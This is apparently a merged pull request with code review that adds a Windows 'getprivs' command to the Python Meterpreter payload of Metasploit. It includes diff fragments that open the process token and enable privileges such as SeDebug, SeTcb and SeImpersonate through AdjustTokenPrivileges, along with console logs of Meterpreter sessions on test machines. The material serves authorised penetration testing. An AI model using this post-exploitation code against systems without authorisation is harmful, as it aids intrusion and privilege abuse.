### PR TITLE
add getprivs command to python windows meterpreter

### PR DESCRIPTION
**Pull request by NtAlexio2**
By this PR, now python meterpreter supports `getprivs` command on windows boxes.

Tested with:
- Python 2.6
- Python 2.7
- Python 3.10

on Windows 10 (Build 19041) box:

```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.22:4444 
[*] Sending stage (40164 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.22:4444 -> 10.0.0.3:49230) at 2023-02-15 18:57:41 -0500

meterpreter > sysinfo
Computer        : DESKTOP-6QKZ8GI
OS              : Windows 10 (Build 19041)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeMachineAccountPrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeCreateGlobalPrivilege
SeCreateSymbolicLinkPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege
SeManageVolumePrivilege
SeRelabelPrivilege
SeSyncAgentPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
```

### CODE REVIEW

File: python/meterpreter/ext_server_stdapi.py [hunk 1]
```diff
@@ -1216,6 +1217,85 @@ def stdapi_sys_config_getuid(request, response):
     response += tlv_pack(TLV_TYPE_USER_NAME, username)
     return ERROR_SUCCESS, response
 
+@register_function_if(has_windll)
+def stdapi_sys_config_getprivs(request, response):
+    TOKEN_QUERY = 0x0008
```
Comment (smcintyre-r7) [inline python/meterpreter/ext_server_stdapi.py:1222]: It's probably time to move this up to the Windows constants section around L735 so it doesn't need to be defined here and in `get_token_user`.

File: python/meterpreter/ext_server_stdapi.py [hunk 2]
```diff
@@ -1216,6 +1217,85 @@ def stdapi_sys_config_getuid(request, response):
...
+    AdjustTokenPrivileges = advapi32.AdjustTokenPrivileges
+    AdjustTokenPrivileges.argtypes = [ctypes.c_void_p, ctypes.c_bool, PTOKEN_PRIVILEGES, ctypes.c_uint32, PTOKEN_PRIVILEGES, ctypes.POINTER(ctypes.c_uint32)]
+    AdjustTokenPrivileges.restype = ctypes.c_bool
+
+    token = ctypes.c_void_p()
+    success = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, token)
+    if not success:
+        return error_result_windows(), response
+
+    priv_list = [
```
Comment (smcintyre-r7) [inline python/meterpreter/ext_server_stdapi.py:1247]: It looks like this is missing some of the entries that the windows side will [enumerate](https://github.com/rapid7/metasploit-payloads/blob/261aaaace4ee5161d2fbbb4d291ce886d5eb1973/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c#L286).

The values can be looked up from the docs [here](https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants).

The Windows one is missing from from the MS docs. We probably want to add all the permissions that are documented in alphabetical order (as they are in the docs) then I can update the Windows Meterpreter to add the missing privileges there.

**Review by smcintyre-r7 — CHANGES_REQUESTED** [review]
Just left the two comments. Other than a couple of missing privileges everything ran correctly with Python 2.6 and 3.9.

File: python/meterpreter/ext_server_stdapi.py (hunk 2 above)
Comment (smcintyre-r7) [reply python/meterpreter/ext_server_stdapi.py:1247]: On looking at that list more closely, I'm not sure that's the list of privileges we'd want to go with. I tested actually requesting all of those and the `SeDelegateSessionUserImpersonatePrivilege` was the only one my session was able to active when running as SYSTEM.

From looking at the docs you linked and taking `SeDenyNetworkLogonRight` as an example:

> [Deny access to this computer from the network](https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/deny-access-to-this-computer-from-the-network)

I don't think we'd want to deny anything.

In comparison with the link I shared references usage with `LookupPrivilegeValue` which is what we're doing here. It also has `SeDelegateSessionUserImpersonatePrivilege` as the only privilege that's missing from the existing list used by Windows and was one I was able to confirm is able to be obtained once added.

Lets just add `SeDelegateSessionUserImpersonatePrivilege` to the Windows Meterpreter, then use the same list from there.

Comment (gwillcox-r7) [reply python/meterpreter/ext_server_stdapi.py:1247]: Sounds good to me and yeah wasn't sure about the Deny ones, I listed those before I realized the code was trying to enable those privileges as well vs just enumerate them.

Comment (gwillcox-r7) [reply python/meterpreter/ext_server_stdapi.py:1258]: Fixed with https://github.com/rapid7/metasploit-payloads/pull/607/commits/ca738c412c1b0e76306e8d4e1015c5a571509bf8

File: python/meterpreter/ext_server_stdapi.py (hunk 1 above)
Comment (gwillcox-r7) [reply python/meterpreter/ext_server_stdapi.py]: Moved the constants around with https://github.com/rapid7/metasploit-payloads/pull/607/commits/ca738c412c1b0e76306e8d4e1015c5a571509bf8

File: python/meterpreter/ext_server_stdapi.py [hunk 3]
```diff
@@ -1216,6 +1232,82 @@ def stdapi_sys_config_getuid(request, response):
...
+        "SeRemoteShutdownPrivilege",
+        "SeRestorePrivilege",
+        "SeSecurityPrivilege",
+        "SeShutdownPrivilege",
+        "SeSystemEnvironmentPrivilege",
+        "SeSystemProfilePrivilege",
+        "SeSystemtimePrivilege",
+        "SeTakeOwnershipPrivilege",
+        "SeTcbPrivilege",
+        "SeUnsolicitedInputPrivilege",
```
Comment (gwillcox-r7) [inline python/meterpreter/ext_server_stdapi.py:1282]: I'm not sure if we should remove this as according to https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_se_exports `This privilege is obsolete and unused. It has no effect on the system.` and this was the only privilege of this entire list that I was not able to enable in my tests.

**Comment by gwillcox-r7** [comment]
From my tests with Python 3.11.1, looks like just the point above that needs to be addressed as otherwise this works beautifully:

```
msf6 payload(python/meterpreter/bind_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeMachineAccountPrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeCreateGlobalPrivilege
SeCreateSymbolicLinkPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege
SeManageVolumePrivilege
SeRelabelPrivilege
SeSyncAgentPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
SeDelegateSessionUserImpersonatePrivilege

meterpreter > 
meterpreter > sysinfo
Computer        : Windows-11-Test
OS              : Windows 10 (Build 22621)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > getuid
Server username: Windows-11-Test\test
meterpreter > 
```

**Comment by gwillcox-r7** [comment]
In tests the following constants couldn't be enabled on a x64 Windows 11 host:

- SeUnsolicitedInputPrivilege

The update at https://github.com/rapid7/metasploit-payloads/pull/607/commits/78347dd3791618446d01b8166754d00da0305373 removes this since https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_se_exports notes this is a depreciated option and setting it doesn't actually have any effect.

File: python/meterpreter/ext_server_stdapi.py (hunk 3 above)
Comment (gwillcox-r7) [reply python/meterpreter/ext_server_stdapi.py]: Fixed with https://github.com/rapid7/metasploit-payloads/commit/78347dd3791618446d01b8166754d00da0305373

**Comment by gwillcox-r7** [comment]
Python 2.6 also working nicely:

```
msf6 payload(python/meterpreter/bind_tcp) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeMachineAccountPrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeCreateGlobalPrivilege
SeCreateSymbolicLinkPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege
SeManageVolumePrivilege
SeRelabelPrivilege
SeSyncAgentPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
SeDelegateSessionUserImpersonatePrivilege

meterpreter > 
```

**Comment by gwillcox-r7** [comment]
This should be good to land now, going to go ahead and merge this in.

**Comment by gwillcox-r7** [comment]
Thanks @NtAlexio2 for putting up this PR, much appreciate these updates!

**Pull request merged**